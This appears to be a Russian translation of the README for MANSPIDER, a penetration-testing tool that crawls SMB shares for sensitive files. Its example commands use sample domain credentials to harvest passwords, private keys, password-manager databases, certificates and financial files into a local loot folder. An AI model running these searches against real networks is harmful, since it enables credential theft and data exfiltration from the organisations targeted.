
Обшаривайте целые сети в поисках ценных файлов, лежащих на SMB-шарах. Ищите по именам файлов или содержимому — поддерживаются регулярные выражения!
Manspider 2.0 здесь! Он включает значительные улучшения:
--modified-after и --modified-before
PDFDOCXXLSXPPTX
# Run directly without installing
uvx --from git+https://github.com/blacklanternsecurity/MANSPIDER manspider --help
# Install globally
uv tool install git+https://github.com/blacklanternsecurity/MANSPIDER
# Run
manspider --help
pipx install git+https://github.com/blacklanternsecurity/MANSPIDER
Manspider использует Kreuzberg для извлечения текста из различных форматов файлов. Для некоторых форматов требуются дополнительные системные зависимости:
# For OCR text extraction from images (PNG, JPEG, etc.)
sudo apt install tesseract-ocr
# For legacy Microsoft Office format support (.doc, .xls)
# Kreuzberg uses LibreOffice for conversion
sudo apt install libreoffice
Без этих зависимостей: Manspider по-прежнему будет работать с PDF, DOCX, XLSX, PPTX и текстовыми файлами, но пропустит OCR изображений и устаревшие форматы Office.
docker run --rm -v ./manspider:/root/.manspider blacklanternsecurity/manspider --help
Обратите внимание, что также есть вспомогательный скрипт manspider.sh, который автоматически монтирует тома для каталогов manspider loot и logs, что делает запуск более удобным:
./manspider.sh --help
ПРИМЕЧАНИЕ: совпадающие файлы автоматически загружаются в $HOME/.manspider/loot! (-n для отключения)
$ manspider 192.168.0.0/24 -f passw user admin account network login logon cred -d evilcorp -u bob -p Passw0rd
$ manspider share.evilcorp.local -f passw -e xlsx csv -d evilcorp -u bob -p Passw0rd
$ manspider share.evilcorp.local -c passw -e xlsx csv docx pdf -d evilcorp -u bob -p Passw0rd
$ manspider share.evilcorp.local -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg pfx cfg conf config vmdk vhd vdi dit -d evilcorp -u bob -p Passw0rd
В этом примере выполняется поиск в каталогах с «финансовыми» названиями файлов, имена которых содержат 5 или более последовательных цифр (например, 000202006.EFT)
$ manspider share.evilcorp.local --dirnames bank financ payable payment reconcil remit voucher vendor eft swift -f '[0-9]{5,}' -d evilcorp -u bob -p Passw0rd
$ manspider share.evilcorp.local -e ppk rsa pem ssh rsa -o -f id_rsa id_dsa id_ed25519 -d evilcorp -u bob -p Passw0rd
$ manspider share.evilcorp.local -e '' -c 'BEGIN .{1,10} PRIVATE KEY' -d evilcorp -u bob -p Passw0rd
# .kdbx - База данных паролей KeePass (KeePass, KeePassXC)
# .kdb - Классическая база данных KeePass (KeePass 1.x)
# .1pif - Формат обмена 1Password (1Password)
# .agilekeychain - Формат Agile Keychain (1Password, устаревший)
# .opvault - Формат OPVault (1Password)
# .lpd - Файл данных LastPass (LastPass)
# .dashlane - Файл данных Dashlane (Dashlane)
# .psafe3 - База данных Password Safe (Password Safe)
# .enpass - Файл данных менеджера паролей Enpass (Enpass)
# .bwdb - База данных Bitwarden (Bitwarden)
# .msecure - Файл данных менеджера паролей mSecure (mSecure)
# .stickypass - Файл данных Sticky Password (Sticky Password)
# .pwm - Файл данных Password Memory (Password Memory)
# .rdb - Файл данных RoboForm (RoboForm)
# .safe - Файл данных менеджера паролей SafeInCloud (SafeInCloud)
# .zps - Зашифрованный файл данных Zoho Vault (Zoho Vault)
# .pmvault - Файл данных SplashID Safe (SplashID Safe)
# .mywallet - Файл данных менеджера паролей MyWallet (MyWallet)
# .jpass - Файл данных менеджера паролей JPass (JPass)
# .pwmdb - База данных Universal Password Manager (Universal Password Manager)
$ manspider share.evilcorp.local -e kdbx kdb 1pif agilekeychain opvault lpd dashlane psafe3 enpass bwdb msecure stickypass pwm rdb safe zps pmvault mywallet jpass pwmdb -d evilcorp -u bob -p Passw0rd
$ manspider share.evilcorp.local -e pfx p12 pkcs12 pem key crt cer csr jks keystore key keys der -d evilcorp -u bob -p Passw0rd
$ manspider share.evilcorp.local -e docx xlsx pdf --modified-after 2026-01-01 -d evilcorp -u bob -p Passw0rd
Вы можете запускать несколько экземпляров manspider одновременно. Это полезно, когда один экземпляр уже запущен, и вы хотите выполнить поиск по загруженным файлам (аналог grep -R). Для этого укажите ключевое слово loot в качестве цели, что позволит искать в загруженных файлах в $HOME/.manspider/loot.
Разумные значения по умолчанию помогают избежать нежелательных ситуаций, таких как зависание на одной цели. Все они могут быть переопределены:
-m)-s)-t)C$, IPC$, ADMIN$, PRINT$ (переопределяется с помощью --exclude-sharenames)Manspider принимает любую комбинацию следующих целей:
Например, вы можете указать любые или все из следующих:
192.168.1.250share.evilcorp.local192.168.1.0/24smb_hosts.txtloot (для поиска уже загруженных файлов)/mnt/share (для рекурсивного поиска в каталоге)
usage: manspider [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-l LOOT_DIR] [-m MAXDEPTH] [-H HASH] [-k] [-aesKey HEX] [-dc-ip IP] [-t THREADS] [-f REGEX [REGEX ...]] [-e EXT [EXT ...]]
[--exclude-extensions EXT [EXT ...]] [-c REGEX [REGEX ...]] [--sharenames SHARE [SHARE ...]] [--exclude-sharenames [SHARE ...]] [--dirnames DIR [DIR ...]]
[--exclude-dirnames DIR [DIR ...]] [-q] [-n] [-mfail INT] [-o] [-s SIZE] [-v]
targets [targets ...]